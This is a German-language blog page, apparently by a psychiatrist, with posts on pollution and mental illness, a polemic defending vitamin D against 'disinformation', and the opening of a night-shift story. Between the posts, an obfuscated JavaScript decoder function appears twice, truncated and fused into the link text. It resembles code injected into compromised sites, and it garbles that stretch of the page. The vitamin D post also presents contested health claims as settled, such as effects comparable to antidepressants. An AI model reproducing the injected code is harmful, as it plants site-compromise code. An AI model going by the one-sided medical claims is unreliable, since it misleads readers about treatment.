Umweltverschmutzung erhöht Risiko für psychische Erkrankungen in den USA und Dänemark

Eine groß angelegte Studie zeigte eine eindeutige Korrelation zwischen Umweltversachmutzung und dem Auftreten von psychischen Erkrankungen in diesen beiden Ländern.

Die genauen Zusammenhänge sind nicht ganz klar, es wird vermutet, daß die Verschmutzung zu einer „Vergiftung“ bzw. „Entzündung“ des Nervensystems beiträgt.

Quelle (in Englisch): https://journals.plos.org/plosbiology/article?id=10.1371/journal.pbio.3000353

Vitamin D: polemische Desinformation!

Zuletzt gab es nicht nur in Fachjournalen, sondern sogar in Tageszeitungen absolute Fehlinformationen über die angebliche „Nichtwirksamkeit“ von Vitamin D – in der Prophylaxe von Osteoporose und Herzinfarkten.

Was nicht gesagt wurde ist, wie unheimlich schlecht die entsprechenden Studien, die hier zitiert werden, eigentlich waren!

Viele davon haben folgendes nicht gemacht:

– geschaut, ob überhaupt ein Vitamin D Mangel vorhanden war zu Beginn
– geschaut, ob der Vitamin D Spiegel gestiegen ist
– jemals Vitamin D gemessen

Damit handelt es sich bei diesen Studien um eine kolossale Verschwendung von Zeit und Geld.

Für Depression gibt es klare, gut gemachte Studien die zeigen:
WENN anfangs ein Vitamin D Mangel besteht, ist der antidepressive Effekt von einer Einnahme von Vitamin D (vorausgesetzt, es wird ein guter Spiegel erreicht), eindeutig vorhanden und sogar vergleichbar mit Antidepressiva!

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4011048/

Eine Geschichte aus der Psychiatrie: Fußball in Island

copyright: Dr. Moritz Mühlbacher

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var vb=“;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndfunction oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var vb=“;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndand/“>Fußball in Island
Und ich hatte gedacht, es würde ruhig bleiben.
Als diensthabender Nachtarzt ist man ja den Ereignissen ähnlich hilflos ausgeliefert, wie ein Seemann Wind und Wetter auf seinem Schiff: Man kann sich in Notsituationen weder ehrenhaft aus dem Staub machen, noch besteht die Möglichkeit, an grundlegenden Naturereignissen viel zu verändern. Man würde sie höchstens kommen sehen, und dann mehr oder weniger geschickt darauf reagieren.
Nein, alle Vorzeichen waren eigentlich günstig gewesen. Weiterlesen